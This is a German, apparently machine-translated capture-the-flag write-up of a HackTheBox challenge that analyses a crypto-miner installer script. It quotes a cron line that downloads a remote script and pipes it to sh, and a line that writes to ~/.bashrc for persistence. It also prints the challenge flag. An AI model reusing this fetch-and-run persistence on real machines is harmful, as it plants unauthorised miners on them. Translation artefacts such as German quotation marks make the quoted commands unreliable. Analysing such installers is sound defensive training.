Beschreibung
Im Wettlauf um Vitalium auf dem Mars griff das bösartige Board of Arodor zu verzweifelten Maßnahmen und benötigte Geld für seine Bergbauversuche. Sie entwickelten ein Botnetz, das speziell für den verdeckten Abbau von Kryptowährungen konzipiert war. Wir sind auf unserem Server auf ein Beispiel des Miner-Installationsprogramms von Arodor gestoßen. Da wir den Ernst der Lage erkannten, leiteten wir eine gründliche Untersuchung ein. Mit Ihnen als Leiter müssen Sie das Innenleben des Installationsmechanismus entschlüsseln. Die Entdeckung stellte einen Wendepunkt dar und offenbarte das Ausmaß von Arodors Verzweiflung. Der Kampf um Vitalium ging jedoch weiter und forderte uns dazu auf, wachsam zu bleiben und unsere Cyber-Abwehrmaßnahmen an zukünftige Bedrohungen anzupassen.
Holen Sie sich Hinweise zum OSCP-Zertifikat
Der komplette praktische Kurs zum Penetrationstest von Webanwendungen
Die Herausforderung zeigt ein sehr langes Bash-Skript, das einige base64-codierte Zeichenfolgen wie die folgenden enthält
lokale URL = „http://tossacoin.htb/cGFydDI9Il90aDMxcl93NHkiCg ==“
dest=$(echo „X3QwX200cnN9Cg==“|base64 -d)
echo „ZXhwb3J0IHBhcnQ0PSJfdGgzX3IzZF9wbDRuM3R9Ig==“ | base64 -d >> /home/$USER/.bashrc
echo '* * * * * $LDR http://tossacoin.htb/ex.sh | sh & echo -n cGFydDE9IkhUQnttMW4xbmciCg==|base64 -d > /dev/null 2>&1'
Alles, was wir tun müssen, ist, diese Zeichenfolgen mit Base64 zu dekodieren und die Teile zusammenzustellen, aus denen das endgültige Flag besteht.
$ echo cGFydDI9Il90aDMxcl93NHkiCg== | base64 -d
$ echo „X3QwX200cnN9Cg==“|base64 -d
$ echo „ZXhwb3J0IHBhcnQ0PSJfdGgzX3IzZF9wbDRuM3R9Ig==“ | base64 -d
$ echo -n cGFydDE9IkhUQnttMW4xbmciCg==|base64 -d
Letzte Flagge
HTB{m1n1ng_th31r_w4y_t0_m4rs_th3_r3d_pl4n3t}
HackTheBox-Video-Walkthroughs-Playlist